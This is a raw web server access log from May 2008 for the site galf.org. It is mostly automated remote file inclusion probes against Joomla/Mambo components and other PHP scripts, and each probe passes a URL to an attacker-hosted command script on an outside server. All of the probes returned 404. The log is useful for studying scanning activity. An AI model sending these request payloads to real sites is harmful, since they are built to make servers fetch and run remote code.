208.101.26.99 - - [04/May/2008:17:30:09 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.195.37.94 - - [04/May/2008:17:30:12 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:30:32 -0700] "GET /logs/access_071008.log//content.php?inc=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:30:34 -0700] "GET //content.php?inc=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:30:35 -0700] "GET /logs//content.php?inc=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.233.12.225 - - [04/May/2008:17:31:13 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:31:23 -0700] "GET /logs/access_080113.log/modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:31:39 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:31:42 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.203.209.2 - - [04/May/2008:17:31:51 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:31:51 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.203.209.2 - - [04/May/2008:17:31:51 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.203.209.2 - - [04/May/2008:17:31:52 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:32:00 -0700] "GET /logs/access_071008.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:32:00 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:32:01 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:32:04 -0700] "GET /logs/access_071014.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.89.217 - - [04/May/2008:17:32:09 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.89.217 - - [04/May/2008:17:32:09 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.225.229.167 - - [04/May/2008:17:32:11 -0700] "GET /logs/access_080414.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:32:20 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:32:23 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.112.43.2 - - [04/May/2008:17:32:47 -0700] "GET /logs/access_080414.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
196.40.71.237 - - [04/May/2008:17:33:34 -0700] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "galf.org"
196.40.71.237 - - [04/May/2008:17:33:34 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "galf.org"
196.40.71.237 - - [04/May/2008:17:33:34 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "galf.org"
208.116.44.60 - - [04/May/2008:17:33:39 -0700] "GET /logs/access_080114.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:33:39 -0700] "GET /logs/access_080114.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.149.32.24 - - [04/May/2008:17:34:17 -0700] "GET /logs/access_080414.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.38.19.130 - - [04/May/2008:17:34:23 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
64.38.19.130 - - [04/May/2008:17:34:23 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.195.37.94 - - [04/May/2008:17:34:27 -0700] "GET /logs/access_071231.log HTTP/1.0" 200 10543588 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.203.209.2 - - [04/May/2008:17:35:57 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:36:04 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:36:07 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:36:07 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.137.192.95 - - [04/May/2008:17:36:48 -0700] "GET /index1.php?page=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:36:53 -0700] "GET /logs/access_071008.log//index.php3?aide=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:36:53 -0700] "GET //index.php3?aide=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:36:53 -0700] "GET /logs//index.php3?aide=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:36:53 -0700] "GET /logs/access_071231.log//index.php3?aide=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:36:56 -0700] "GET /logs/access_071008.log//index.php3?aide=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:36:56 -0700] "GET //index.php3?aide=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:36:56 -0700] "GET /logs//index.php3?aide=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:36:56 -0700] "GET /logs/access_071231.log//index.php3?aide=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:37:13 -0700] "GET /logs//index.php3?aide=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:37:13 -0700] "GET //index.php3?aide=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:37:17 -0700] "GET /logs/access_071008.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:37:17 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:37:17 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:37:22 -0700] "GET /logs/access_071014.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:37:33 -0700] "GET /logs//index.php3?aide=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:37:34 -0700] "GET //index.php3?aide=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:37:42 -0700] "GET /logs//index.php3?aide=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:37:42 -0700] "GET //index.php3?aide=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:38:01 -0700] "GET /logs/scripts.log//index.php3?aide=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:38:02 -0700] "GET //index.php3?aide=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:38:04 -0700] "GET /logs//index.php3?aide=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.12.53.176 - - [04/May/2008:17:38:09 -0700] "GET /logs/access_071008.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.225.216.227 - - [04/May/2008:17:38:21 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://cinta.sitesled.com/batam/cream/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
66.225.216.227 - - [04/May/2008:17:38:21 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://cinta.sitesled.com/batam/cream/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
195.12.53.176 - - [04/May/2008:17:38:46 -0700] "GET /logs/access_070924.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.225.229.167 - - [04/May/2008:17:38:51 -0700] "GET /squirrelcart//modules/My_eGallery/public/uploadFile.php?basepath=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
85.19.150.85 - - [04/May/2008:17:38:51 -0700] "GET /logs/access_080113.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.19.150.85 - - [04/May/2008:17:38:51 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.19.150.85 - - [04/May/2008:17:38:51 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.233.89.217 - - [04/May/2008:17:39:19 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.89.217 - - [04/May/2008:17:39:19 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.89.217 - - [04/May/2008:17:39:20 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.89.217 - - [04/May/2008:17:39:22 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.89.217 - - [04/May/2008:17:39:23 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.12.225 - - [04/May/2008:17:39:23 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.89.217 - - [04/May/2008:17:39:23 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.12.225 - - [04/May/2008:17:39:24 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.12.225 - - [04/May/2008:17:39:24 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.8.80 - - [04/May/2008:17:40:06 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xxxxfatalxxxx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
67.15.8.80 - - [04/May/2008:17:40:07 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xxxxfatalxxxx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:40:08 -0700] "GET /logs/access_071008.log//index.php3?aide=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.210.31.3 - - [04/May/2008:17:40:08 -0700] "GET /logs/access_070827.log/index1.php?pag=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.210.31.3 - - [04/May/2008:17:40:09 -0700] "GET /index1.php?pag=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.210.31.3 - - [04/May/2008:17:40:09 -0700] "GET /logs/index1.php?pag=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.210.31.3 - - [04/May/2008:17:40:09 -0700] "GET /logs/access_070917.log/index1.php?pag=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.233.89.217 - - [04/May/2008:17:40:11 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.89.217 - - [04/May/2008:17:40:12 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.156.192.5 - - [04/May/2008:17:40:14 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://aceperform.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
213.156.192.5 - - [04/May/2008:17:40:14 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://aceperform.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:40:16 -0700] "GET /logs/access_080113.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:40:16 -0700] "GET /logs/access_080113.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:40:17 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:40:18 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:40:19 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:40:22 -0700] "GET /logs/access_080218.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.86.76.34 - - [04/May/2008:17:40:43 -0700] "GET /logs/access.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.76.34 - - [04/May/2008:17:40:43 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.76.34 - - [04/May/2008:17:40:43 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.76.34 - - [04/May/2008:17:40:50 -0700] "GET /logs/access_071112.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:41:01 -0700] "GET /logs/access_080218.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.210.31.3 - - [04/May/2008:17:41:05 -0700] "GET /index1.php?pag=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.112.43.2 - - [04/May/2008:17:41:15 -0700] "GET /logs/access.log//Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
208.112.43.2 - - [04/May/2008:17:41:15 -0700] "GET //Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
208.112.43.2 - - [04/May/2008:17:41:15 -0700] "GET /logs//Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
82.210.31.3 - - [04/May/2008:17:41:18 -0700] "GET /logs/index1.php?pag=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:41:18 -0700] "GET /logs/access_071203.log//content.php?inc=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:41:23 -0700] "GET /logs/access.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:41:23 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:41:23 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:41:26 -0700] "GET /logs/access.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:41:26 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:41:26 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:41:37 -0700] "GET /logs/access_071112.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:41:42 -0700] "GET /logs/access_071112.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:41:48 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.76.34 - - [04/May/2008:17:41:50 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.76.34 - - [04/May/2008:17:41:51 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.149.209.100 - - [04/May/2008:17:41:51 -0700] "GET /logs/access.log//Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
62.149.209.100 - - [04/May/2008:17:41:52 -0700] "GET //Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
62.149.209.100 - - [04/May/2008:17:41:52 -0700] "GET /logs//Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
196.40.71.237 - - [04/May/2008:17:41:57 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "galf.org"
196.40.71.237 - - [04/May/2008:17:41:57 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "galf.org"
196.40.71.237 - - [04/May/2008:17:41:57 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "galf.org"
72.32.68.172 - - [04/May/2008:17:42:13 -0700] "GET /logs/access.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
